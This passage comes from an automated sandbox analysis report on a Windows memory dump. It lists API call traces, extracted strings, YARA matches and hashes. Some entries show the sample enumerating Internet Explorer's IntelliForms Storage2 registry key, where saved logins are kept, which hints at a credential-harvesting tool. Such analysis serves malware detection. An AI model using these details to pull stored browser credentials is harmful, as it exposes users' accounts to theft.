                                                    • Part of subcall function 0040A497: _snwprintf.MSVCRT ref: 0040A4BC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Menu$DestroyItemWindowmemset$ChildCountCreateDialogEnumInfoLoadParamTextWindows_snwprintfwcschr
                                                  • String ID: caption
                                                  • API String ID: 1928666178-4135340389
                                                  • Opcode ID: 2a735e7d3e9f25f5000f535f47a02417f98db50f76fb95be89fb06d3c5800170
                                                  • Instruction ID: 1ee1ed61ad6e464c94b1b5c04ceaba47984998c4c5bccbb9cf540d7a9e91c68f
                                                  • Opcode Fuzzy Hash: 2a735e7d3e9f25f5000f535f47a02417f98db50f76fb95be89fb06d3c5800170
                                                  • Instruction Fuzzy Hash: 4C21B472100314BBDB11AF50DC49BAF3B78FF45751F148436F905A5191D7788AA0CB6A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpywcslen$_snwprintfmemset
                                                  • String ID: %s (%s)$G@
                                                  • API String ID: 3979103747-4021399728
                                                  • Opcode ID: f04d55ffe867956f13ff29a0b22ee26a635b57cfc1c306c95c53cfde12d0b5a1
                                                  • Instruction ID: 7020ae682d4dad294ec7254b180182bae2c538f47323e789ebcab58d633c0506
                                                  • Opcode Fuzzy Hash: f04d55ffe867956f13ff29a0b22ee26a635b57cfc1c306c95c53cfde12d0b5a1
                                                  • Instruction Fuzzy Hash: 58215E72900219BBDF21DF95CD4599BB7B8BF04358F40846AF948AB201EB74EA188BD4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004071E5,?,00000000,?,0040C6FE,00000000), ref: 004070E4
                                                  • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,004071E5,?,00000000,?,0040C6FE), ref: 00407102
                                                  • wcslen.MSVCRT ref: 0040710F
                                                  • wcscpy.MSVCRT ref: 0040711F
                                                  • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,004071E5,?,00000000,?,0040C6FE,00000000), ref: 00407129
                                                  • wcscpy.MSVCRT ref: 00407139
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                  • String ID: Unknown Error$netmsg.dll
                                                  • API String ID: 2767993716-572158859
                                                  • Opcode ID: 26114b79388437db0e90dde86d0aa8455aeff93cef19d95b112ae8d9efa36594
                                                  • Instruction ID: 89f566b746906e4e3228774242dd749435861e54522ca67c51f24cfbd45377e0
                                                  • Opcode Fuzzy Hash: 26114b79388437db0e90dde86d0aa8455aeff93cef19d95b112ae8d9efa36594
                                                  • Instruction Fuzzy Hash: 2301F231A08114BBEB145B61EC46E9FBB68EB05BA1F20007AF606F41D0DEB96F00969C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00407548: GetFileAttributesW.KERNELBASE(?,0040A987,?,0040AA3E,00000000,?,00000000,00000208,?), ref: 0040754C
                                                  • wcscpy.MSVCRT ref: 0040A998
                                                  • wcscpy.MSVCRT ref: 0040A9A8
                                                  • GetPrivateProfileIntW.KERNEL32 ref: 0040A9B9
                                                    • Part of subcall function 0040A51E: GetPrivateProfileStringW.KERNEL32 ref: 0040A53A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: PrivateProfilewcscpy$AttributesFileString
                                                  • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                  • API String ID: 3176057301-2039793938
                                                  • Opcode ID: 1673debe331e7a8ca134e50d5334904a3cc19ce9f9385a73b99b164dd8d493e6
                                                  • Instruction ID: f715108fd1d236bc9ad6a323193eaeb919362f53399fbb1b2bc2ef5a739791b1
                                                  • Opcode Fuzzy Hash: 1673debe331e7a8ca134e50d5334904a3cc19ce9f9385a73b99b164dd8d493e6
                                                  • Instruction Fuzzy Hash: 33F0CD22EC035536E61176221D07F3E25088BA1B66F95447FBD08BA2D3DE7C4A14869E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  • out of memory, xrefs: 0042CFEC
                                                  • cannot ATTACH database within transaction, xrefs: 0042CDED
                                                  • attached databases must use the same text encoding as main database, xrefs: 0042CEF6
                                                  • database %s is already in use, xrefs: 0042CE4F
                                                  • unable to open database: %s, xrefs: 0042CFD5
                                                  • too many attached databases - max %d, xrefs: 0042CDD7
                                                  • database is already attached, xrefs: 0042CEA8
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpymemset
                                                  • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                  • API String ID: 1297977491-2001300268
                                                  • Opcode ID: 9031da780ff69da590ffb3ad1101421015f0ee0ff19cf333b8a9ef6fce115eea
                                                  • Instruction ID: 266062839a895961ad217d8ef2c4278de09ba8d71166d49c3bc68db0563119ae
                                                  • Opcode Fuzzy Hash: 9031da780ff69da590ffb3ad1101421015f0ee0ff19cf333b8a9ef6fce115eea
                                                  • Instruction Fuzzy Hash: BE91C171B00315AFDB20DF69D981B9EBBF1AF04308F64845FE8159B282D778EA41CB59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADC7
                                                    • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADD5
                                                    • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADE6
                                                    • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADFD
                                                    • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040AE06
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040B01A
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040B036
                                                  • memcpy.MSVCRT ref: 0040B05B
                                                  • memcpy.MSVCRT ref: 0040B06F
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040B0F2
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040B0FC
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040B134
                                                    • Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A034
                                                    • Part of subcall function 00409FF5: LoadStringW.USER32(00000000,00000007,00000FFF,?), ref: 0040A0CD
                                                    • Part of subcall function 00409FF5: memcpy.MSVCRT ref: 0040A10D
                                                    • Part of subcall function 00409FF5: wcscpy.MSVCRT ref: 0040A076
                                                    • Part of subcall function 00409FF5: wcslen.MSVCRT ref: 0040A094
                                                    • Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A0A2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                  • String ID: ($d
                                                  • API String ID: 1140211610-1915259565
                                                  • Opcode ID: 5dcfa6d27d7cd3b1b3e4f808df3914de81461d1c90a1f760cbfea76231314b4a
                                                  • Instruction ID: 8a5fa3be38e8e11f26e8e9502e5dff09d3bfeaf4ce2a81799fe883ad29a31388
                                                  • Opcode Fuzzy Hash: 5dcfa6d27d7cd3b1b3e4f808df3914de81461d1c90a1f760cbfea76231314b4a
                                                  • Instruction Fuzzy Hash: 50517872601700AFE728DF2AC586A5AB7E4FF48358F10852EE55ACB791DB74E940CB48
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 0041510E
                                                  • Sleep.KERNEL32(00000001), ref: 00415118
                                                  • GetLastError.KERNEL32 ref: 0041512A
                                                  • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 00415202
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$ErrorLastLockSleepUnlock
                                                  • String ID:
                                                  • API String ID: 3015003838-0
                                                  • Opcode ID: 9f8ed0d04d3051dd5d2585b6ab40f83052c279f07ad27e494029b12bda0602be
                                                  • Instruction ID: 880e68434f8ef122057b7821066ce039c6a6aeb50982fb6198a036ab3cbbf4dd
                                                  • Opcode Fuzzy Hash: 9f8ed0d04d3051dd5d2585b6ab40f83052c279f07ad27e494029b12bda0602be
                                                  • Instruction Fuzzy Hash: 7641F379504B42EFE3228F219C05BEBB7E0EFC0B15F20492FF59556240CBB9D9858E1A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045162C,00415469,00000000,?,00000000,00000000), ref: 00415D77
                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 00415D7E
                                                  • GetLastError.KERNEL32 ref: 00415D8B
                                                  • Sleep.KERNEL32(00000064), ref: 00415DA0
                                                  • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045162C,00415469,00000000,?,00000000,00000000), ref: 00415DA9
                                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00415DB0
                                                  • GetLastError.KERNEL32 ref: 00415DBD
                                                  • Sleep.KERNEL32(00000064), ref: 00415DD2
                                                  • free.MSVCRT(00000000), ref: 00415DDB
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$AttributesDeleteErrorLastSleep$free
                                                  • String ID:
                                                  • API String ID: 2802642348-0
                                                  • Opcode ID: 6ec6a6250f4bc7cdf171a96923757e46c1f9deb9adab3d10569e0c4ca2454acf
                                                  • Instruction ID: 389b81331b8195f66de6fade72418799adbb9e1ccdce19076b3e4dce97b88e29
                                                  • Opcode Fuzzy Hash: 6ec6a6250f4bc7cdf171a96923757e46c1f9deb9adab3d10569e0c4ca2454acf
                                                  • Instruction Fuzzy Hash: 13118A39500E10DBC6203B747C8D6FF36249BD7B37B21832BF963952D1DA5948C2566A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                  • API String ID: 3510742995-3273207271
                                                  • Opcode ID: 449b515319a675a2a0fe7de20888cf946b50a79f9f1d785cd6ce0af7e4c5c8d6
                                                  • Instruction ID: 1d27d4cf7977f40543be0eb13b72094ec5c0409efe485552fd301264f6eb4def
                                                  • Opcode Fuzzy Hash: 449b515319a675a2a0fe7de20888cf946b50a79f9f1d785cd6ce0af7e4c5c8d6
                                                  • Instruction Fuzzy Hash: 570145B6E54260F2FA3024058EE6FF30145CB62754FA40027F88AA02C0A1CD0EE3A29F
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00407EB8: free.MSVCRT(?,00408225,00000000,?,00000000), ref: 00407EBB
                                                    • Part of subcall function 00407EB8: free.MSVCRT(?,?,00408225,00000000,?,00000000), ref: 00407EC3
                                                    • Part of subcall function 00411B67: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00412303,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?), ref: 00411B7A
                                                    • Part of subcall function 00408001: free.MSVCRT(?,00000000,?,004082EE,00000000,?,00000000), ref: 00408010
                                                  • memset.MSVCRT ref: 004096C7
                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,80000001,?,?,?,?,00000000,?), ref: 004096F5
                                                  • _wcsupr.MSVCRT ref: 0040970F
                                                    • Part of subcall function 00407EDE: wcslen.MSVCRT ref: 00407EF0
                                                    • Part of subcall function 00407EDE: free.MSVCRT(?,00000001,?,00000000,?,?,0040833F,?,000000FF), ref: 00407F16
                                                    • Part of subcall function 00407EDE: free.MSVCRT(?,00000001,?,00000000,?,?,0040833F,?,000000FF), ref: 00407F39
                                                    • Part of subcall function 00407EDE: memcpy.MSVCRT ref: 00407F5D
                                                  • memset.MSVCRT ref: 0040975E
                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,80000001,80000001,?,000000FF,?,?,?,?,00000000), ref: 00409789
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 00409796
                                                  Strings
                                                  • Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 00409674
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                  • String ID: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                                                  • API String ID: 4131475296-680441574
                                                  • Opcode ID: 4edf4f35556499e99a9905e10d8b542405bf2b72c6e8e1cec08b7677914b6bc8
                                                  • Instruction ID: ced938f56f23152dc4036b8c9c372f29a7907612beabbfd18841790b2154e098
                                                  • Opcode Fuzzy Hash: 4edf4f35556499e99a9905e10d8b542405bf2b72c6e8e1cec08b7677914b6bc8
                                                  • Instruction Fuzzy Hash: F84118B6D4011DABCB10EF99DD85AEFB7BCAF18304F1040AAB504F2191D7749B458BA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A034
                                                  • wcscpy.MSVCRT ref: 0040A076
                                                    • Part of subcall function 0040A4E7: memset.MSVCRT ref: 0040A4FA
                                                    • Part of subcall function 0040A4E7: _itow.MSVCRT ref: 0040A508
                                                  • wcslen.MSVCRT ref: 0040A094
                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A0A2
                                                  • LoadStringW.USER32(00000000,00000007,00000FFF,?), ref: 0040A0CD
                                                  • memcpy.MSVCRT ref: 0040A10D
                                                    • Part of subcall function 00409F53: ??2@YAPAXI@Z.MSVCRT ref: 00409F8D
                                                    • Part of subcall function 00409F53: ??2@YAPAXI@Z.MSVCRT ref: 00409FAB
                                                    • Part of subcall function 00409F53: ??2@YAPAXI@Z.MSVCRT ref: 00409FC9
                                                    • Part of subcall function 00409F53: ??2@YAPAXI@Z.MSVCRT ref: 00409FE7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                  • String ID: strings
                                                  • API String ID: 3166385802-3030018805
                                                  • Opcode ID: 87213f91dec3db501add7610991c2df7427240ace99253c04b166c5a9059b18a
                                                  • Instruction ID: f88dad89c8a087f2027bd78e20ebd55682c2f8a720c3c381d0e8595ecd4ac891
                                                  • Opcode Fuzzy Hash: 87213f91dec3db501add7610991c2df7427240ace99253c04b166c5a9059b18a
                                                  • Instruction Fuzzy Hash: 84419A792003059BD7149F18EC91F323365F76430AB99053AE802A73B2DB79EC22CB1E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                  • String ID: sysdatetimepick32
                                                  • API String ID: 1028950076-4169760276
                                                  • Opcode ID: 690b26e669973beaba76962047fb40553a53b69d8850747cc34062e580a6b82a
                                                  • Instruction ID: 9d6a1000cc6d846fb7caa7b95204278ebeb8f13d5a9664e287c5e204bace7976
                                                  • Opcode Fuzzy Hash: 690b26e669973beaba76962047fb40553a53b69d8850747cc34062e580a6b82a
                                                  • Instruction Fuzzy Hash: E21177325002197AEB24EB91DD4AE9F77BCEF04750F4040B6F508E1192E7745A51CB69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpy$memset
                                                  • String ID: -journal$-wal
                                                  • API String ID: 438689982-2894717839
                                                  • Opcode ID: 3fb32538101a96232d471ca328e00ad1292916094483904f8e7d4fc59e84f921
                                                  • Instruction ID: 551b55634523189e5c53bd135c739114fe40c1c2f7e89174430398bb56853e76
                                                  • Opcode Fuzzy Hash: 3fb32538101a96232d471ca328e00ad1292916094483904f8e7d4fc59e84f921
                                                  • Instruction Fuzzy Hash: 54A1DEB1A00606BFDB14CFA4C8517DEBBB0BF04314F14856EE468D7381D778AA95CB99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetDlgItem.USER32 ref: 00404DE0
                                                  • GetDlgItem.USER32 ref: 00404DF3
                                                  • GetDlgItem.USER32 ref: 00404E08
                                                  • GetDlgItem.USER32 ref: 00404E20
                                                  • EndDialog.USER32(?,00000002), ref: 00404E3C
                                                  • EndDialog.USER32(?,00000001), ref: 00404E51
                                                    • Part of subcall function 00404AFB: GetDlgItem.USER32 ref: 00404B08
                                                    • Part of subcall function 00404AFB: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00404B1D
                                                  • SendDlgItemMessageW.USER32 ref: 00404E69
                                                  • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00404F7A
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Item$Dialog$MessageSend
                                                  • String ID:
                                                  • API String ID: 3975816621-0
                                                  • Opcode ID: 9463777c25d7b60e80699a536a719800608f97c85c6655884db1f8f9bc34b99a
                                                  • Instruction ID: 9cc36a3a9081561078e880a2f522ad53539937229c5c78969c314d16862aa257
                                                  • Opcode Fuzzy Hash: 9463777c25d7b60e80699a536a719800608f97c85c6655884db1f8f9bc34b99a
                                                  • Instruction Fuzzy Hash: DE61D570100705ABDB31AF25C885A2A73B9FF90724F04C63EF615A66E1D778ED50CB99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • _wcsicmp.MSVCRT ref: 00441E61
                                                  • _wcsicmp.MSVCRT ref: 00441E76
                                                  • _wcsicmp.MSVCRT ref: 00441E8B
                                                    • Part of subcall function 00407278: wcslen.MSVCRT ref: 00407287
                                                    • Part of subcall function 00407278: wcslen.MSVCRT ref: 00407291
                                                    • Part of subcall function 00407278: _memicmp.MSVCRT ref: 004072AC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _wcsicmp$wcslen$_memicmp
                                                  • String ID: .save$http://$https://$log profile$signIn
                                                  • API String ID: 1214746602-2708368587
                                                  • Opcode ID: 7c97f00c0957198ec044a334814b20feb48abd6bee8cf84da93a3bd7193c5eb8
                                                  • Instruction ID: 7a979a8a07820355720b76b8412d60638824142cd7e99aea4044fab4cdb489ca
                                                  • Opcode Fuzzy Hash: 7c97f00c0957198ec044a334814b20feb48abd6bee8cf84da93a3bd7193c5eb8
                                                  • Instruction Fuzzy Hash: A34146755487014AF7309A65898177773E8CB04329F308A2FF86BE26E2EB7CB4C6551E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                  • String ID:
                                                  • API String ID: 2313361498-0
                                                  • Opcode ID: 07ae1ada1d4f6eb4fb6f42e99af867561cb551597841fb4f97c145b1ea01b73e
                                                  • Instruction ID: ba4bb41810d6ea78f7103a52efe52e464eccc4a9d5620aafabcd38e7c3fa5a1e
                                                  • Opcode Fuzzy Hash: 07ae1ada1d4f6eb4fb6f42e99af867561cb551597841fb4f97c145b1ea01b73e
                                                  • Instruction Fuzzy Hash: 2331D3B1501601BFDB24AF69D94692AF7B8FF04304B10813EF145EB291D778EC90CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetClientRect.USER32 ref: 0040D0E2
                                                  • GetWindowRect.USER32 ref: 0040D0F8
                                                  • GetWindowRect.USER32 ref: 0040D10B
                                                  • BeginDeferWindowPos.USER32 ref: 0040D128
                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040D145
                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040D165
                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040D18C
                                                  • EndDeferWindowPos.USER32(?), ref: 0040D195
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$Defer$Rect$BeginClient
                                                  • String ID:
                                                  • API String ID: 2126104762-0
                                                  • Opcode ID: 3e059de2c2a39fa097f99da28ed46862c9af8e23a81d8ce39be14bc790b9e9d0
                                                  • Instruction ID: 1b30ad45943261d114c7945feb8e2d934b1f0a15928f611d2c59e033839f0f44
                                                  • Opcode Fuzzy Hash: 3e059de2c2a39fa097f99da28ed46862c9af8e23a81d8ce39be14bc790b9e9d0
                                                  • Instruction Fuzzy Hash: 5F21D875900209FFDB11DFA8CD89FEEBBB9FB48701F104164F655A2160C771AA519B24
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                  • String ID:
                                                  • API String ID: 4218492932-0
                                                  • Opcode ID: 91481d4031c4b0f89b54af3f497fb88c2307565dbaae607565dd24303698038d
                                                  • Instruction ID: b821822af8fa1f08beba458ee4fa97db6355aebb6f9a48b4278dc6bbcb45c8c8
                                                  • Opcode Fuzzy Hash: 91481d4031c4b0f89b54af3f497fb88c2307565dbaae607565dd24303698038d
                                                  • Instruction Fuzzy Hash: 601163F3900118ABDB00EFA4DC899DAB7ACEF19710F454536FA09DB144E674E748C7A9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • EmptyClipboard.USER32(?,?,0040D79F,-00000210), ref: 00407303
                                                  • wcslen.MSVCRT ref: 00407310
                                                  • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,0040D79F,-00000210), ref: 00407320
                                                  • GlobalLock.KERNEL32 ref: 0040732D
                                                  • memcpy.MSVCRT ref: 00407336
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0040733F
                                                  • SetClipboardData.USER32 ref: 00407348
                                                  • CloseClipboard.USER32 ref: 00407358
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                  • String ID:
                                                  • API String ID: 1213725291-0
APIs
• GetDlgItem.USER32 ref: 00404BDE
• SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00404BF7
• SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00404C04
• SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00404C10
• memset.MSVCRT ref: 00404C74
• SendMessageW.USER32(?,0000105F,?,?), ref: 00404CA9
• SetFocus.USER32(?), ref: 00404D2F
Memory Dump Source
• Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessageSend$FocusItemmemset
• String ID:
• API String ID: 4281309102-0

APIs
  • Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
  • Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192
• wcscat.MSVCRT ref: 0040BE5B
• _snwprintf.MSVCRT ref: 0040BE82
Memory Dump Source
• Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FileWrite_snwprintfwcscatwcslen
• String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
• API String ID: 2451617256-4153097237

Memory Dump Source
• Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ItemMenu$CountInfomemsetwcschr
• String ID: 0$6
• API String ID: 2029023288-3849865405

Memory Dump Source
• Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: wcscat$_snwprintfmemset
• String ID: %2.2X
• API String ID: 2521778956-791839006

APIs
• wcscpy.MSVCRT ref: 00441B9B
• wcscat.MSVCRT ref: 00441BAA
• wcscat.MSVCRT ref: 00441BBB
• wcscat.MSVCRT ref: 00441BCA
• VerQueryValueW.VERSION(?,?,00000000,?), ref: 00441BE4
  • Part of subcall function 00407447: wcslen.MSVCRT ref: 0040744E
  • Part of subcall function 00407447: memcpy.MSVCRT ref: 00407464
  • Part of subcall function 00407511: lstrcpyW.KERNEL32 ref: 00407526
  • Part of subcall function 00407511: lstrlenW.KERNEL32(?), ref: 0040752D
Memory Dump Source
• Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
• String ID: \StringFileInfo\
• API String ID: 393120378-2245444037

Memory Dump Source
• Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: _snwprintfwcscpy
• String ID: dialog_%d$general$menu_%d$strings
• API String ID: 999028693-502967061

Memory Dump Source
• Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: memcpy
• String ID: !-A$Y,A$a,A$a,A$,A
• API String ID: 3510742995-194831239

Memory Dump Source
• Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: memset
• String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
• API String ID: 2221118986-1606337402

APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040F96C,00000000,00000000), ref: 00410F16
• memset.MSVCRT ref: 00410F78
• memset.MSVCRT ref: 00410F88
  • Part of subcall function 00410DF5: wcscpy.MSVCRT ref: 00410E1E
• memset.MSVCRT ref: 00411073
• wcscpy.MSVCRT ref: 00411094
• CloseHandle.KERNEL32(?,0040F96C,?,?,?,0040F96C,00000000,00000000), ref: 004110EA
Memory Dump Source
• Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: memset$wcscpy$CloseHandleOpenProcess
• String ID:
• API String ID: 3300951397-0

APIs
• memset.MSVCRT ref: 0040D560
  • Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A034
  • Part of subcall function 00409FF5: LoadStringW.USER32(00000000,00000007,00000FFF,?), ref: 0040A0CD
  • Part of subcall function 00409FF5: memcpy.MSVCRT ref: 0040A10D
  • Part of subcall function 00409FF5: wcscpy.MSVCRT ref: 0040A076
  • Part of subcall function 00409FF5: wcslen.MSVCRT ref: 0040A094
